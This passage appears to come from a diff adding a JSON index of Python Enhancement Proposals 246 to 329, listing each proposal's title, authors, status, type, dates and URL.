"post_history": "29-Mar-2001, 10-Jan-2005", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0246/" + }, + "247": { + "number": 247, + "title": "API for Cryptographic Hash Functions", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "23-Mar-2001", + "python_version": null, + "post_history": "20-Sep-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0247/" + }, + "248": { + "number": 248, + "title": "Python Database API Specification v1.0", + "authors": "Greg Stein, Marc-Andr\u00e9 Lemburg", + "discussions_to": "db-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "08-May-1996", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "249", + "url": "https://peps.python.org/pep-0248/" + }, + "249": { + "number": 249, + "title": "Python Database API Specification v2.0", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": "db-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "12-Apr-1999", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": "248", + "superseded_by": null, + "url": "https://peps.python.org/pep-0249/" + }, + "250": { + "number": 250, + "title": "Using site-packages on Windows", + "authors": "Paul Moore", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Mar-2001", + "python_version": "2.2", + "post_history": "30-Mar-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0250/" + }, + "251": { + "number": 251, + "title": "Python 2.2 Release Schedule", + "authors": "Barry Warsaw, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "17-Apr-2001", + "python_version": "2.2", + "post_history": "14-Aug-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0251/" + }, + "252": { + "number": 252, + "title": "Making Types Look More Like Classes", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Apr-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0252/" + }, + "253": { + "number": 253, + "title": "Subtyping Built-in Types", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-May-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0253/" + }, + "254": { + "number": 254, + "title": "Making Classes Look More Like Types", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Jun-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0254/" + }, + "255": { + "number": 255, + "title": "Simple Generators", + "authors": "Neil Schemenauer, Tim Peters, Magnus Lie Hetland", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-May-2001", + "python_version": "2.2", + "post_history": "14-Jun-2001, 23-Jun-2001", + "resolution": null, + "requires": "234", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0255/" + }, + "256": { + "number": 256, + "title": "Docstring Processing System Framework", + "authors": "David Goodger", + "discussions_to": "doc-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Jun-2001", + "python_version": null, + "post_history": "13-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0256/" + }, + "257": { + "number": 257, + "title": "Docstring Conventions", + "authors": "David Goodger, Guido van Rossum", + "discussions_to": "doc-sig@python.org", + "status": "Active", + "type": "Informational", + "topic": "", + "created": "29-May-2001", + "python_version": null, + "post_history": "13-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0257/" + }, + "258": { + "number": 258, + "title": "Docutils Design Specification", + "authors": "David Goodger", + "discussions_to": "doc-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "31-May-2001", + "python_version": null, + "post_history": "13-Jun-2001", + "resolution": null, + "requires": "256, 257", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0258/" + }, + "259": { + "number": 259, + "title": "Omit printing newline after newline", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Jun-2001", + "python_version": "2.2", + "post_history": "11-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0259/" + }, + "260": { + "number": 260, + "title": "Simplify xrange()", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Jun-2001", + "python_version": "2.2", + "post_history": "26-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0260/" + }, + "261": { + "number": 261, + "title": "Support for \"wide\" Unicode characters", + "authors": "Paul Prescod", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Jun-2001", + "python_version": "2.2", + "post_history": "27-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0261/" + }, + "262": { + "number": 262, + "title": "A Database of Installed Python Packages", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Jul-2001", + "python_version": null, + "post_history": "27-Mar-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0262/" + }, + "263": { + "number": 263, + "title": "Defining Python Source Code Encodings", + "authors": "Marc-Andr\u00e9 Lemburg, Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "06-Jun-2001", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0263/" + }, + "264": { + "number": 264, + "title": "Future statements in simulated shells", + "authors": "Michael Hudson", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jul-2001", + "python_version": "2.2", + "post_history": "30-Jul-2001", + "resolution": null, + "requires": "236", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0264/" + }, + "265": { + "number": 265, + "title": "Sorting Dictionaries by Value", + "authors": "Grant Griffin", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "08-Aug-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0265/" + }, + "266": { + "number": 266, + "title": "Optimizing Global Variable/Attribute Access", + "authors": "Skip Montanaro", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "13-Aug-2001", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0266/" + }, + "267": { + "number": 267, + "title": "Optimized Access to Module Namespaces", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "23-May-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0267/" + }, + "268": { + "number": 268, + "title": "Extended HTTP functionality and WebDAV", + "authors": "Greg Stein", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "20-Aug-2001", + "python_version": "2.x", + "post_history": "21-Aug-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0268/" + }, + "269": { + "number": 269, + "title": "Pgen Module for Python", + "authors": "Jonathan Riehl", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "24-Aug-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0269/" + }, + "270": { + "number": 270, + "title": "uniq method for list objects", + "authors": "Jason Petrone", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "21-Aug-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0270/" + }, + "271": { + "number": 271, + "title": "Prefixing sys.path by command line option", + "authors": "Fr\u00e9d\u00e9ric B. Giacometti", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "15-Aug-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0271/" + }, + "272": { + "number": 272, + "title": "API for Block Encryption Algorithms v1.0", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "18-Sep-2001", + "python_version": null, + "post_history": "17-Apr-2002, 29-May-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0272/" + }, + "273": { + "number": 273, + "title": "Import Modules from Zip Archives", + "authors": "James C. Ahlstrom", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Oct-2001", + "python_version": "2.3", + "post_history": "26-Oct-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0273/" + }, + "274": { + "number": 274, + "title": "Dict Comprehensions", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "25-Oct-2001", + "python_version": "2.7, 3.0", + "post_history": "29-Oct-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0274/" + }, + "275": { + "number": 275, + "title": "Switching on Multiple Values", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "10-Nov-2001", + "python_version": "2.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0275/" + }, + "276": { + "number": 276, + "title": "Simple Iterator for ints", + "authors": "Jim Althoff", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "12-Nov-2001", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0276/" + }, + "277": { + "number": 277, + "title": "Unicode file name support for Windows NT", + "authors": "Neil Hodgson", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Jan-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0277/" + }, + "278": { + "number": 278, + "title": "Universal Newline Support", + "authors": "Jack Jansen", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-Jan-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0278/" + }, + "279": { + "number": 279, + "title": "The enumerate() built-in function", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jan-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0279/" + }, + "280": { + "number": 280, + "title": "Optimizing access to globals", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0280/" + }, + "281": { + "number": 281, + "title": "Loop Counter Iteration with range and xrange", + "authors": "Magnus Lie Hetland", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Feb-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0281/" + }, + "282": { + "number": 282, + "title": "A Logging System", + "authors": "Vinay Sajip, Trent Mick", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-Feb-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0282/" + }, + "283": { + "number": 283, + "title": "Python 2.3 Release Schedule", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "27-Feb-2002", + "python_version": "2.3", + "post_history": "27-Feb-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0283/" + }, + "284": { + "number": 284, + "title": "Integer for-loops", + "authors": "David Eppstein, Gregory Ewing", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Mar-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0284/" + }, + "285": { + "number": 285, + "title": "Adding a bool type", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Mar-2002", + "python_version": "2.3", + "post_history": "08-Mar-2002, 30-Mar-2002, 03-Apr-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0285/" + }, + "286": { + "number": 286, + "title": "Enhanced Argument Tuples", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "03-Mar-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0286/" + }, + "287": { + "number": 287, + "title": "reStructuredText Docstring Format", + "authors": "David Goodger", + "discussions_to": "doc-sig@python.org", + "status": "Active", + "type": "Informational", + "topic": "", + "created": "25-Mar-2002", + "python_version": null, + "post_history": "02-Apr-2002", + "resolution": null, + "requires": null, + "replaces": "216", + "superseded_by": null, + "url": "https://peps.python.org/pep-0287/" + }, + "288": { + "number": 288, + "title": "Generators Attributes and Exceptions", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "21-Mar-2002", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0288/" + }, + "289": { + "number": 289, + "title": "Generator Expressions", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jan-2002", + "python_version": "2.4", + "post_history": "22-Oct-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0289/" + }, + "290": { + "number": 290, + "title": "Code Migration and Modernization", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "06-Jun-2002", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0290/" + }, + "291": { + "number": 291, + "title": "Backward Compatibility for the Python 2 Standard Library", + "authors": "Neal Norwitz", + "discussions_to": null, + "status": "Superseded", + "type": "Informational", + "topic": "", + "created": "06-Jun-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "387", + "url": "https://peps.python.org/pep-0291/" + }, + "292": { + "number": 292, + "title": "Simpler String Substitutions", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Jun-2002", + "python_version": "2.4", + "post_history": "18-Jun-2002, 23-Mar-2004, 22-Aug-2004", + "resolution": null, + "requires": null, + "replaces": "215", + "superseded_by": null, + "url": "https://peps.python.org/pep-0292/" + }, + "293": { + "number": 293, + "title": "Codec Error Handling Callbacks", + "authors": "Walter D\u00f6rwald", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Jun-2002", + "python_version": "2.3", + "post_history": "19-Jun-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0293/" + }, + "294": { + "number": 294, + "title": "Type Names in the types Module", + "authors": "Oren Tirosh", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "19-Jun-2002", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0294/" + }, + "295": { + "number": 295, + "title": "Interpretation of multiline string constants", + "authors": "Stepan Koltsov", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "22-Jul-2002", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0295/" + }, + "296": { + "number": 296, + "title": "Adding a bytes Object Type", + "authors": "Scott Gilbert", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "12-Jul-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0296/" + }, + "297": { + "number": 297, + "title": "Support for System Upgrades", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "19-Jul-2001", + "python_version": "2.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0297/" + }, + "298": { + "number": 298, + "title": "The Locked Buffer Interface", + "authors": "Thomas Heller", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "26-Jul-2002", + "python_version": "2.3", + "post_history": "30-Jul-2002, 01-Aug-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0298/" + }, + "299": { + "number": 299, + "title": "Special __main__() function in modules", + "authors": "Jeff Epler", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "12-Aug-2002", + "python_version": "2.3", + "post_history": "29-Mar-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0299/" + }, + "301": { + "number": 301, + "title": "Package Index and Metadata for Distutils", + "authors": "Richard Jones", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "24-Oct-2002", + "python_version": "2.3", + "post_history": "08-Nov-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0301/" + }, + "302": { + "number": 302, + "title": "New Import Hooks", + "authors": "Just van Rossum, Paul Moore", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Dec-2002", + "python_version": "2.3", + "post_history": "19-Dec-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0302/" + }, + "303": { + "number": 303, + "title": "Extend divmod() for Multiple Divisors", + "authors": "Thomas Bellman", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "31-Dec-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0303/" + }, + "304": { + "number": 304, + "title": "Controlling Generation of Bytecode Files", + "authors": "Skip Montanaro", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "22-Jan-2003", + "python_version": null, + "post_history": "27-Jan-2003, 31-Jan-2003, 17-Jun-2005", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0304/" + }, + "305": { + "number": 305, + "title": "CSV File API", + "authors": "Kevin Altis, Dave Cole, Andrew McNamara, Skip Montanaro, Cliff Wells", + "discussions_to": "csv@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Jan-2003", + "python_version": "2.3", + "post_history": "31-Jan-2003, 13-Feb-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0305/" + }, + "306": { + "number": 306, + "title": "How to Change Python's Grammar", + "authors": "Michael Hudson, Jack Diederich, Alyssa Coghlan, Benjamin Peterson", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "29-Jan-2003", + "python_version": null, + "post_history": "30-Jan-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0306/" + }, + "307": { + "number": 307, + "title": "Extensions to the pickle protocol", + "authors": "Guido van Rossum, Tim Peters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "31-Jan-2003", + "python_version": "2.3", + "post_history": "07-Feb-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0307/" + }, + "308": { + "number": 308, + "title": "Conditional Expressions", + "authors": "Guido van Rossum, Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "07-Feb-2003", + "python_version": "2.5", + "post_history": "07-Feb-2003, 11-Feb-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0308/" + }, + "309": { + "number": 309, + "title": "Partial Function Application", + "authors": "Peter Harris", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Feb-2003", + "python_version": "2.5", + "post_history": "10-Feb-2003, 27-Feb-2003, 22-Feb-2004, 28-Apr-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0309/" + }, + "310": { + "number": 310, + "title": "Reliable Acquisition/Release Pairs", + "authors": "Michael Hudson, Paul Moore", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Dec-2002", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0310/" + }, + "311": { + "number": 311, + "title": "Simplified Global Interpreter Lock Acquisition for Extensions", + "authors": "Mark Hammond", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Feb-2003", + "python_version": "2.3", + "post_history": "05-Feb-2003, 14-Feb-2003, 19-Apr-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0311/" + }, + "312": { + "number": 312, + "title": "Simple Implicit Lambda", + "authors": "Roman Suzi, Alex Martelli", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "11-Feb-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0312/" + }, + "313": { + "number": 313, + "title": "Adding Roman Numeral Literals to Python", + "authors": "Mike Meyer", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Apr-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0313/" + }, + "314": { + "number": 314, + "title": "Metadata for Python Software Packages 1.1", + "authors": "A.M. Kuchling, Richard Jones", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "12-Apr-2003", + "python_version": "2.5", + "post_history": "29-Apr-2003", + "resolution": null, + "requires": null, + "replaces": "241", + "superseded_by": "345", + "url": "https://peps.python.org/pep-0314/" + }, + "315": { + "number": 315, + "title": "Enhanced While Loop", + "authors": "Raymond Hettinger, W Isaac Carroll", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Apr-2003", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0315/" + }, + "316": { + "number": 316, + "title": "Programming by Contract for Python", + "authors": "Terence Way", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "02-May-2003", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0316/" + }, + "317": { + "number": 317, + "title": "Eliminate Implicit Exception Instantiation", + "authors": "Steven Taschuk", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "06-May-2003", + "python_version": "2.4", + "post_history": "09-Jun-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0317/" + }, + "318": { + "number": 318, + "title": "Decorators for Functions and Methods", + "authors": "Kevin D. Smith, Jim J. Jewett, Skip Montanaro, Anthony Baxter", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Jun-2003", + "python_version": "2.4", + "post_history": "09-Jun-2003, 10-Jun-2003, 27-Feb-2004, 23-Mar-2004, 30-Aug-2004, 02-Sep-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0318/" + }, + "319": { + "number": 319, + "title": "Python Synchronize/Asynchronize Block", + "authors": "Michel Pelletier", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Feb-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0319/" + }, + "320": { + "number": 320, + "title": "Python 2.4 Release Schedule", + "authors": "Barry Warsaw, Raymond Hettinger, Anthony Baxter", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "29-Jul-2003", + "python_version": "2.4", + "post_history": "01-Dec-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0320/" + }, + "321": { + "number": 321, + "title": "Date/Time Parsing and Formatting", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "16-Sep-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0321/" + }, + "322": { + "number": 322, + "title": "Reverse Iteration", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Sep-2003", + "python_version": "2.4", + "post_history": "24-Sep-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0322/" + }, + "323": { + "number": 323, + "title": "Copyable Iterators", + "authors": "Alex Martelli", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "25-Oct-2003", + "python_version": "2.5", + "post_history": "29-Oct-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0323/" + }, + "324": { + "number": 324, + "title": "subprocess - New process module", + "authors": "Peter Astrand", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Nov-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0324/" + }, + "325": { + "number": 325, + "title": "Resource-Release Support for Generators", + "authors": "Samuele Pedroni", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Aug-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0325/" + }, + "326": { + "number": 326, + "title": "A Case for Top and Bottom Values", + "authors": "Josiah Carlson, Terry Reedy", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "20-Dec-2003", + "python_version": "2.4", + "post_history": "20-Dec-2003, 03-Jan-2004, 05-Jan-2004, 07-Jan-2004, 21-Feb-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0326/" + }, + "327": { + "number": 327, + "title": "Decimal Data Type", + "authors": "Facundo Batista", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "17-Oct-2003", + "python_version": "2.4", + "post_history": "30-Nov-2003, 02-Jan-2004, 29-Jan-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0327/" + }, + "328": { + "number": 328, + "title": "Imports: Multi-Line and Absolute/Relative", + "authors": "Aahz", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "21-Dec-2003", + "python_version": "2.4, 2.5, 2.6", + "post_history": "08-Mar-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0328/" + }, + "329": { + "number": 329, + "title": "Treating Builtins as Constants in the Standard Library", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Rejected", + "type": 